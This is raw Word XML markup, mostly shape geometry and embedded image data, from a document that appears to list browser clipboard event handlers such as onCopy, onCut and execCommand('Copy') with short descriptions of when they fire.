                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 527 506"/>
                              <a:gd name="T35" fmla="*/ 527 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 668 506"/>
                              <a:gd name="T39" fmla="*/ 668 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 688 506"/>
                              <a:gd name="T43" fmla="*/ 688 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 689 506"/>
                              <a:gd name="T47" fmla="*/ 6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2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Text Box 110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06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onCopy()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3" o:spid="_x0000_s1329" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:25.3pt;width:37.1pt;height:9.15pt;z-index:-17635328;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,506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">
                <v:shape id="Freeform 1105" o:spid="_x0000_s1330" style="position:absolute;left:1930;top:506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lck8IA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP24rCMBB9X/Afwgj7smhShUWrUUQQXRHEywcMzdgW&#10;m0lpYu3+/UYQ9m0O5zrzZWcr0VLjS8cakqECQZw5U3Ku4XrZDCYgfEA2WDkmDb/kYbnofcwxNe7J&#10;J2rPIRcxhH2KGooQ6lRKnxVk0Q9dTRy5m2sshgibXJoGnzHcVnKk1Le0WHJsKLCmdUHZ/fywGrY/&#10;h8p3V9zZC06T/fGuDu2X0vqz361mIAJ14V/8du9MnJ+oMby+iSf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iVyTwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m720,183r-699,l18,182,,162r,-4l,21,21,,720,r21,21l741,162r-18,20l720,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,689;21,689;18,688;0,668;0,664;0,527;21,506;720,506;741,527;741,668;723,688;720,689" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1104" o:spid="_x0000_s1331" type="#_x0000_t202" style="position:absolute;left:1930;top:506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oJsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9C/0PYQq9aaIUsVujSKkgCMV1e+hxuhl3&#10;g5vJdhN1/feNIHibx/uc+bJ3jThTF6xnDeORAkFcemO50vBdrIczECEiG2w8k4YrBVgungZzzIy/&#10;cE7nfaxECuGQoYY6xjaTMpQ1OQwj3xIn7uA7hzHBrpKmw0sKd42cKDWVDi2nhhpb+qipPO5PTsPq&#10;h/NP+/f1u8sPuS2KN8Xb6VHrl+d+9Q4iUh8f4rt7Y9L8sXqF2zfp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JoJ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onCopy()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1664" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4636135</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>321310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1064895" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1099" name="Group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895" cy="116205"/>
                          <a:chOff x="7301" y="506"/>
                          <a:chExt cx="1677" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1100" name="Freeform 1102"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7300" y="506"/>
                            <a:ext cx="1677" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8956 7301"/>
                              <a:gd name="T1" fmla="*/ T0 w 1677"/>
                              <a:gd name="T2" fmla="+- 0 689 506"/>
                              <a:gd name="T3" fmla="*/ 689 h 183"/>
                              <a:gd name="T4" fmla="+- 0 7322 7301"/>
                              <a:gd name="T5" fmla="*/ T4 w 1677"/>
                              <a:gd name="T6" fmla="+- 0 689 506"/>
                              <a:gd name="T7" fmla="*/ 689 h 183"/>
                              <a:gd name="T8" fmla="+- 0 7319 7301"/>
                              <a:gd name="T9" fmla="*/ T8 w 1677"/>
                              <a:gd name="T10" fmla="+- 0 688 506"/>
                              <a:gd name="T11" fmla="*/ 688 h 183"/>
                              <a:gd name="T12" fmla="+- 0 7301 7301"/>
                              <a:gd name="T13" fmla="*/ T12 w 1677"/>
                              <a:gd name="T14" fmla="+- 0 668 506"/>
                              <a:gd name="T15" fmla="*/ 668 h 183"/>
                              <a:gd name="T16" fmla="+- 0 7301 7301"/>
                              <a:gd name="T17" fmla="*/ T16 w 1677"/>
                              <a:gd name="T18" fmla="+- 0 664 506"/>
                              <a:gd name="T19" fmla="*/ 664 h 183"/>
                              <a:gd name="T20" fmla="+- 0 7301 7301"/>
                              <a:gd name="T21" fmla="*/ T20 w 1677"/>
                              <a:gd name="T22" fmla="+- 0 527 506"/>
                              <a:gd name="T23" fmla="*/ 527 h 183"/>
                              <a:gd name="T24" fmla="+- 0 7322 7301"/>
                              <a:gd name="T25" fmla="*/ T24 w 1677"/>
                              <a:gd name="T26" fmla="+- 0 506 506"/>
                              <a:gd name="T27" fmla="*/ 506 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8956 7301"/>
                              <a:gd name="T29" fmla="*/ T28 w 1677"/>
                              <a:gd name="T30" fmla="+- 0 506 506"/>
                              <a:gd name="T31" fmla="*/ 506 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8977 7301"/>
                              <a:gd name="T33" fmla="*/ T32 w 1677"/>
                              <a:gd name="T34" fmla="+- 0 527 506"/>
                              <a:gd name="T35" fmla="*/ 527 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8977 7301"/>
                              <a:gd name="T37" fmla="*/ T36 w 1677"/>
                              <a:gd name="T38" fmla="+- 0 668 506"/>
                              <a:gd name="T39" fmla="*/ 668 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8959 7301"/>
                              <a:gd name="T41" fmla="*/ T40 w 1677"/>
                              <a:gd name="T42" fmla="+- 0 688 506"/>
                              <a:gd name="T43" fmla="*/ 688 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8956 7301"/>
                              <a:gd name="T45" fmla="*/ T44 w 1677"/>
                              <a:gd name="T46" fmla="+- 0 689 506"/>
                              <a:gd name="T47" fmla="*/ 6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677" h="183">
                                <a:moveTo>
                                  <a:pt x="165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655" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1676" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1676" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1658" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="165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Text Box 1101"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7300" y="506"/>
                            <a:ext cx="167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3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execCommand("Copy")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0" o:spid="_x0000_s1332" style="position:absolute;left:0;text-align:left;margin-left:365.05pt;margin-top:25.3pt;width:83.85pt;height:9.15pt;z-index:-17634816;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="7301,506" coordsize="167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">
                <v:shape id="Freeform 1102" o:spid="_x0000_s1333" style="position:absolute;left:7300;top:506;width:1677;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="16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2lSMcA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF7wX/wzJCL6Vu7EE0dZUiCFKUYrSH3obs&#10;uAnNzsbsqum/7xwEbzO8N+99M1/2vlFX6mId2MB4lIEiLoOt2Rk4HtavU1AxIVtsApOBP4qwXAye&#10;5pjbcOM9XYvklIRwzNFAlVKbax3LijzGUWiJRTuFzmOStXPadniTcN/otyybaI81S0OFLa0qKn+L&#10;izfw/fIVZ7utc5fi5+zWYbv6bE6FMc/D/uMdVKI+Pcz3640V/HEm/PKNjK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4tpUjHAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m1655,183l21,183r-3,-1l,162r,-4l,21,21,,1655,r21,21l1676,162r-18,20l1655,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1655,689;21,689;18,688;0,668;0,664;0,527;21,506;1655,506;1676,527;1676,668;1658,688;1655,689" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1101" o:spid="_x0000_s1334" type="#_x0000_t202" style="position:absolute;left:7300;top:506;width:167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XLvsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQRvNdkexK5GEbFQKIjr9tDjuBl3&#10;g5vJdpPq+u9NodDbPN7nLNeDa8WV+mA9a8imCgRx5Y3lWsNn+fY8BxEissHWM2m4U4D1avS0xNz4&#10;Gxd0PcZapBAOOWpoYuxyKUPVkMMw9R1x4s6+dxgT7GtperylcNfKF6Vm0qHl1NBgR9uGqsvxx2nY&#10;fHGxs9/706E4F7YsXxV/zC5aT8bDZgEi0hD/xX/ud5PmZyqD32/SC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XLv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3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execCommand("Copy")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(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when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user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>about</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>selection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>of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object)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="1360" w:right="1440" w:bottom="280" w:left="1460" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
        </w:sect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ind w:left="420" w:hanging="231"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="421"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="420" w:hanging="231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784448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417195" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1096" name="Group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1930" y="167"/>
                          <a:chExt cx="657" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1097" name="Freeform 1099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657" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2565 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 657"/>
                              <a:gd name="T2" fmla="+- 0 349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 657"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 657"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 657"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 657"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 657"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 657"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2565 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 657"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2586 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 657"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2586 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 657"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2568 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 657"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2565 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 657"/>
                              <a:gd name="T46" fmla="+- 0 349 167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35" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="638" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63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Text Box 109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onCut()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7" o:spid="_x0000_s1335" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:32.85pt;height:9.15pt;z-index:15784448;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167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">
                <v:shape id="Freeform 1099" o:spid="_x0000_s1336" style="position:absolute;left:1930;top:167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fxwsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0Pywi96a45NDF1lVIotMQejAoeh+w0&#10;Cc3OhuzWpP++KxS8zeN9zmY32U5cafCtYw2rpQJBXDnTcq3hdHxbZCB8QDbYOSYNv+Rht32YbTA3&#10;buQDXctQixjCPkcNTQh9LqWvGrLol64njtyXGyyGCIdamgHHGG47mSj1JC22HBsa7Om1oeq7/LEa&#10;QpmdVeIrW6Pa++IzKT4u61Trx/n08gwi0BTu4n/3u4nz1TqF2zfxB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fxwsMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m635,182r-614,l18,182,,161r,-3l,21,21,,635,r21,21l656,161r-18,21l635,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="635,349;21,349;18,349;0,328;0,325;0,188;21,167;635,167;656,188;656,328;638,349;635,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1098" o:spid="_x0000_s1337" type="#_x0000_t202" style="position:absolute;left:1930;top:167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T4OcYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvDMAyF74P9B6NCb6vdHcqa1i1lbDAYlKXpoUct&#10;VhPTWM5ir83+/XQY7Cbxnt77tN6OoVNXGpKPbGE+M6CI6+g8NxaO1evDE6iUkR12kcnCDyXYbu7v&#10;1li4eOOSrofcKAnhVKCFNue+0DrVLQVMs9gTi3aOQ8As69BoN+BNwkOnH41Z6ICepaHFnp5bqi+H&#10;72Bhd+LyxX/tPz/Kc+mramn4fXGxdjoZdytQmcb8b/67fnOCb5aCK9/IC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T4Oc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onCut()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AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="141" w:line="439" w:lineRule="auto"/>
        <w:ind w:left="190" w:firstLine="84"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>needs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copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>something</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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exploited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(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>needs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copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>something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exploited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the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="141" w:line="439" w:lineRule="auto"/>
        <w:ind w:left="190" w:firstLine="168"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>command)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>command)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:spacing w:line="439" w:lineRule="auto"/>
        <w:sectPr w:rsidR="00AC7743">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="1580" w:right="1440" w:bottom="280" w:left="1460" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:num="3" w:space="708" w:equalWidth="0">
            <w:col w:w="460" w:space="517"/>
            <w:col w:w="4861" w:space="1356"/>
            <w:col w:w="1826"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2010"/>
          <w:tab w:val="left" w:pos="2011"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="189" w:lineRule="exact"/>
        <w:ind w:left="2010" w:hanging="1821"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr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485682688" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4582160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-213995</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1010920" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1093" name="Group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0920" cy="116205"/>
                          <a:chOff x="7216" y="-337"/>
                          <a:chExt cx="1592" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1094" name="Freeform 1096"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7215" y="-337"/>
                            <a:ext cx="1592" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8786 7216"/>
                              <a:gd name="T1" fmla="*/ T0 w 1592"/>
                              <a:gd name="T2" fmla="+- 0 -154 -337"/>
                              <a:gd name="T3" fmla="*/ -154 h 183"/>
                              <a:gd name="T4" fmla="+- 0 7237 7216"/>
                              <a:gd name="T5" fmla="*/ T4 w 1592"/>
                              <a:gd name="T6" fmla="+- 0 -154 -337"/>
                              <a:gd name="T7" fmla="*/ -154 h 183"/>
                              <a:gd name="T8" fmla="+- 0 7234 7216"/>
                              <a:gd name="T9" fmla="*/ T8 w 1592"/>
                              <a:gd name="T10" fmla="+- 0 -155 -337"/>
                              <a:gd name="T11" fmla="*/ -155 h 183"/>
                              <a:gd name="T12" fmla="+- 0 7216 7216"/>
                              <a:gd name="T13" fmla="*/ T12 w 1592"/>
                              <a:gd name="T14" fmla="+- 0 -175 -337"/>
                              <a:gd name="T15" fmla="*/ -175 h 183"/>
                              <a:gd name="T16" fmla="+- 0 7216 7216"/>
                              <a:gd name="T17" fmla="*/ T16 w 1592"/>
                              <a:gd name="T18" fmla="+- 0 -179 -337"/>
                              <a:gd name="T19" fmla="*/ -179 h 183"/>
                              <a:gd name="T20" fmla="+- 0 7216 7216"/>
                              <a:gd name="T21" fmla="*/ T20 w 1592"/>
                              <a:gd name="T22" fmla="+- 0 -316 -337"/>
                              <a:gd name="T23" fmla="*/ -316 h 183"/>
                              <a:gd name="T24" fmla="+- 0 7237 7216"/>
                              <a:gd name="T25" fmla="*/ T24 w 1592"/>
                              <a:gd name="T26" fmla="+- 0 -337 -337"/>
                              <a:gd name="T27" fmla="*/ -337 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8786 7216"/>
                              <a:gd name="T29" fmla="*/ T28 w 1592"/>
                              <a:gd name="T30" fmla="+- 0 -337 -337"/>
                              <a:gd name="T31" fmla="*/ -337 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8807 7216"/>
                              <a:gd name="T33" fmla="*/ T32 w 1592"/>
                              <a:gd name="T34" fmla="+- 0 -316 -337"/>
                              <a:gd name="T35" fmla="*/ -316 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8807 7216"/>
                              <a:gd name="T37" fmla="*/ T36 w 1592"/>
                              <a:gd name="T38" fmla="+- 0 -175 -337"/>
                              <a:gd name="T39" fmla="*/ -175 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8789 7216"/>
                              <a:gd name="T41" fmla="*/ T40 w 1592"/>
                              <a:gd name="T42" fmla="+- 0 -155 -337"/>
                              <a:gd name="T43" fmla="*/ -155 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8786 7216"/>
                              <a:gd name="T45" fmla="*/ T44 w 1592"/>
                              <a:gd name="T46" fmla="+- 0 -154 -337"/>
                              <a:gd name="T47" fmla="*/ -15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183">
                                <a:moveTo>
                                  <a:pt x="157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570" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1591" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1591" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1573" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="157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Text Box 1095"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7215" y="-337"/>
                            <a:ext cx="159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4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execCommand("Cut")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4" o:spid="_x0000_s1338" style="position:absolute;left:0;text-align:left;margin-left:360.8pt;margin-top:-16.85pt;width:79.6pt;height:9.15pt;z-index:-17633792;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="7216,-337" coordsize="159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">
                <v:shape id="Freeform 1096" o:spid="_x0000_s1339" style="position:absolute;left:7215;top:-337;width:1592;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="159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CKGcIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP22oCMRB9L/gPYQq+1aTdUurWKFbQWt+0fsCwme4u&#10;biZLkr34901B8G0O5zqL1Wgb0ZMPtWMNzzMFgrhwpuZSw/ln+/QOIkRkg41j0nClAKvl5GGBuXED&#10;H6k/xVKkEA45aqhibHMpQ1GRxTBzLXHifp23GBP0pTQehxRuG/mi1Ju0WHNqqLClTUXF5dRZDd9+&#10;d2gPmWqO5jPs55czd9fsS+vp47j+ABFpjHfxzb03ab6av8L/N+kE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cIoZwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m1570,183l21,183r-3,-1l,162r,-4l,21,21,,1570,r21,21l1591,162r-18,20l1570,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1570,-154;21,-154;18,-155;0,-175;0,-179;0,-316;21,-337;1570,-337;1591,-316;1591,-175;1573,-155;1570,-154" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1095" o:spid="_x0000_s1340" type="#_x0000_t202" style="position:absolute;left:7215;top:-337;width:159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VXp8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H/g/hBP2NhMHk7UaRWSDwUBW64OPZ3O2&#10;webSNZl2/70ZDHy7j+/nLVaDa8WF+mA9a5hOFAjiyhvLtYZ9+f70CiJEZIOtZ9LwSwFWy9HDAnPj&#10;r1zQZRdrkUI45KihibHLpQxVQw7DxHfEiTv53mFMsK+l6fGawl0rn5WaSYeWU0ODHW0aqs67H6dh&#10;feDizX5vj1/FqbBlmSn+nJ21fhwP6zmISEO8i//dHybNV9kL/H2TTp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lV6f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4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execCommand("Cut")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320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2540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="949325" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1090" name="Group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9325" cy="116205"/>
                          <a:chOff x="1930" y="4"/>
                          <a:chExt cx="1495" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1091" name="Freeform 1093"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="3"/>
                            <a:ext cx="1495" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3404 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1495"/>
                              <a:gd name="T2" fmla="+- 0 186 4"/>
                              <a:gd name="T3" fmla="*/ 186 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1495"/>
